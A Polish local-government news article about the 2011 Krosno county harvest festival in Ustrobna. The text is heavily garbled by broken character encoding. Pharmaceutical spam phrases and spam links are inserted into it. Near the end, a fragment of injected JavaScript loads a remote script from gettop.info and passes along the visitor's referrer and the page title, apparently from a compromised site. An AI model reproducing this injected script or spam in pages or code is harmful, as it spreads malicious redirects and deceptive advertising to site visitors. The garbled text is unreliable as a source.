DOAi??YNKI POWIATU KROAsNIEA?SKIEGO W USTROBNEJ – GMINA WOJASZAi??WKA


Po raz pierwszy w historii Gminy WojaszA?wka miaAi??y miejsceAi?? DoA?ynki Powiatu KroAi??nieAi??skiego. UroczystoAi??ci odbyAi??y siAi?? 4 wrzeAi??nia 2011 roku w Ustrobnej. WspA?Ai??organizatorami DoA?ynek byli:Ai?? Starostwo Powiatowe w KroAi??nie oraz Gmina WojaszA?wka.

buy motilium domperidone doz_05
DoA?ynki Powiatowe rozpoczeto MszAi?? Ai??w., ktA?rAi?? koncelebrowaAi?? proboszcz parafii Ustrobna – ks. Artur PROGOROWICZ w asyscie ks. StanisAi??awa WOLAKA, proboszcza parafii OdrzykoAi?? – ks. Jana RYDZIKA oraz proboszcza parafii A?Ai??czki JagielloAi??skie – ks. Janusza BUREGO.
W homilii podkreAi??lono jak waA?na jest Ai??wiadomoAi??Ai?? czAi??owieka w stosunku do dostatku oraz braku poA?ywienia we wspA?Ai??czesnym Ai??wiecie, jednoczeAi??nie wskazujAi??c jak waA?ne jest Ai??wiAi??to plonA?w dla kaA?dego rolnika. PodziAi??kowano rA?wnieA? wA?jtowi oraz wszystkim zaangaA?owanym w organizacjAi?? doA?ynek za entuzjazm oraz wysiAi??ek wAi??oA?ony w ich przygotowanie.

W uroczystoAi??ciach doA?ynkowych udziaAi?? wziAi??li min.: Alicja ZAJAi??C – senator RP, StanisAi??aw PIOTROWICZ – senator RP, MaAi??gorzata CHOMYCZ – Wojewoda Podkarpacki, Bogdan RZOA?CA – radny Sejmiku WojewA?dztwa Podkarpackiego, Jan JUSZCZAKAi?? – Starosta Powiatu KroAi??nieAi??skiego, Andrzej GUZIK – W-ce Starosta Powiatu, Radni Powiatu KroAi??nieAi??skiego na czele z PrzewodniczAi??cym Rady Andrzejem KRA?Ai??AA?KIEM, delegacje z wieAi??cami doA?ynkowymi ze wszystkich gmin Powiatu KroAi??nieAi??skiego na czele z Burmistrzami, WA?jtami i PrzewodniczAi??cymi Rad, Radni Gminy WojaszA?wka z Wice PrzewodniczAi??cym Rady.

Oficjalnego otwarcia doA?ynek dokonaAi?? starosta kroAi??nieAi??ski – Jan JUSZCZAK, ktA?ry w swoim przemA?wieniu podkreAi??liAi?? ogromnAi?? wagAi?? wydarzenia jakim sAi?? doA?ynki, nazywajAi??c je dziAi??kczynieniem za wszelkie dobra. PodziAi??kowaAi?? rA?wnieA? rolnikom za ich pracAi?? i trud oraz wyraziAi?? podziw nad ich umiejAi??tnoAi??ciAi?? Ai??wiAi??towania. Starostowie DoA?ynek Powiatowych: Maria SAMBORSKA z Ustrobnej i Eugeniusz JAKUBAS z Odrzykonia wrAi??czyli Janowi JUSZCZAKOWI – gospodarzowi powiatu kroAi??nieAi??skiego doA?ynkowy bochen chleba.

Jako reprezentant Senatu RP gAi??os zabraAi?? Senator RP StanisAi??aw PIOTROWICZ, natomiast w imieniu administracji rzAi??dowej gAi??os zabraAi??a MaAi??gorzata CHOMYCZ.

CzAi??Ai??Ai?? oficjalnAi?? uroczystoAi??ci zakoAi??czyAi?? WA?jt Gminy WojaszA?wka – SAi??awomir STEFAA?SKI, kierujAi??c sAi??owa podziAi??kowania do rolnikA?w z powiatu kroAi??nieAi??skiego, za ich bezcennAi?? pracAi??, ktA?ra daje nam chleb powszedni. PodkreAi??liAi??, A?e tegoroczny trud rolnika obciAi??A?ony jest nie tylko pracAi?? ale takA?e trudnymi warunkami pogodowymi.

DoA?ynki Powiatowe staAi??y siAi?? takA?e okazjAi?? do docenienia pracy najbardziej zasAi??uA?onych rolnikA?w powiatu kroAi??nieAi??skiego. Najbardziej zasAi??uA?eni rolnicy zostali uhonorowani symbolicznymi statuetkami wykonanymi przez Andrzeja WRZECIONKO z Iwli. Z terenu Gminy RymanA?w okolicznoAi??ciowe statuetki otrzymali rolnicy: Daniel BRUK z PuAi??aw oraz Eugeniusz RUSNOK z WisAi??oczka, ktA?re w ich imieniu odebraAi?? Burmistrz Gminy – Wojciech FARBANIEC. JednAi?? z wielu atrakcji doA?ynek byAi??y barwne stoiska przygotowane przez poszczegA?lne gminy powiatu kroAi??nieAi??skiego, na ktA?rych moA?na byAi??o podziwiaAi?? rAi??kodzieAi??o artystyczne, obrazy, zdjAi??cia oraz skosztowaAi?? tradycyjnego jadAi??a. Dla szczegA?lnie zainteresowanych przygotowano rA?wnieA? foldery, mapy, a takA?e wydawnictwa gminne. WystawAi?? pAi??odA?w rolnych zorganizowali pracownicy PODR BoguchwaAi??a – ZespA?Ai?? w KroAi??nie i ARiMR w KroAi??nie, natomiast stoisko informacyjne dla rolnikA?w – pracownicy KRUS Krosno.

Jednoczesnie oznajmiono, A?e przyszAi??oroczne doA?ynki powiatowe odbAi??dAi?? siAi?? w Gminie RymanA?w.

Z uwagi na to, A?e wyrA?A?nieni rolinicy z Gminy RymanA?w nie odebrali osobiAi??cie przyznanych im statuetek, wrAi??czone one zostaAi??y im przez przedstawicieli WAi??adz Samorzadowych, przed oficjalnym rozpoczeciem XV-ej sesji Rady Miejskiej w Rymanowie w dniu 30 wrzeAi??nia 2011 r.

http://iconssed.fkip.unej.ac.id/?p=2208 Alicja Kurylak

A?rA?dAi??o: UG RymanA?w} else { how to buy cialis from canada levothroid generic name s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; Pills http://2iyf.com/?p=14140


Napisz komentarz:

"UWAGA! Komentarze niezgodne z regulaminem serwisu nie będą publikowane. Zachęcamy do kulturalnego wyrażania opinii na temat artykułów oraz unikania personalnych ataków słownych."